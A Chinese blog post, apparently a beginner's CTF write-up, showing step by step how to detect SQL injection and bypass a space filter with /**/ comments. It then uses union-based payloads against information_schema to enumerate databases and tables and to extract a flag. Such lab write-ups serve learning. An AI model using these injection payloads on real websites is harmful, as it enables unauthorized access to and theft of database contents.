sql注入的相关简单实例


当前第2页 返回上一页

本人也是初学者,参考了许多大佬的wp 自己写出来后有什么错误的地方,希望大家指出,谢谢!

根据页面提示,到底过滤了什么东西?可以知道一定过滤了什么....

分别输入1,2,3有对应的结果

使用'会报错,于是

构造常用的sql语句:1' and '1'='1

没有反应试一试1' and '1'='2

还是没反应,工具提示,应该是过滤了什么,改一下sql语句试一试

1and1=1

可以显示东西,经过判断过滤了空格,我们使用/**/来代替空格

试一试1'/**/and/**/'1'='1

发现有结果了:

于是构建sql语句:

判断有那些数据库:


1

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到结果:

查看有哪些数据表:


1

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

发现了flag的表,我们猜测应该是在web1数据库中并且字段就是flag(其实就在本页面的数据库中)

故:


1

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

以上就是sql注入的相关简单实例的详细内容,更多文章请关注木庄网络博客!!

返回前面的内容

相关阅读 >>

sql注入的相关简单实例

mysql数据库进行连接的简单示例代码

mysql连接查询实例详解

mysql数据控制语言实例分享

介绍sql server临时表和游标实例用法

mysql中关于触发器的操作实例详解

mysql求2个或以上字段为null值的实例分享

php 闭包实例解析

sql的模糊查询实例讲解

mysql慢查询日志相关的配置和使用

更多相关阅读请进入《实例》频道 >>


数据库系统概念 第6版
书籍

数据库系统概念 第6版

机械工业出版社

本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...

    暂无评论...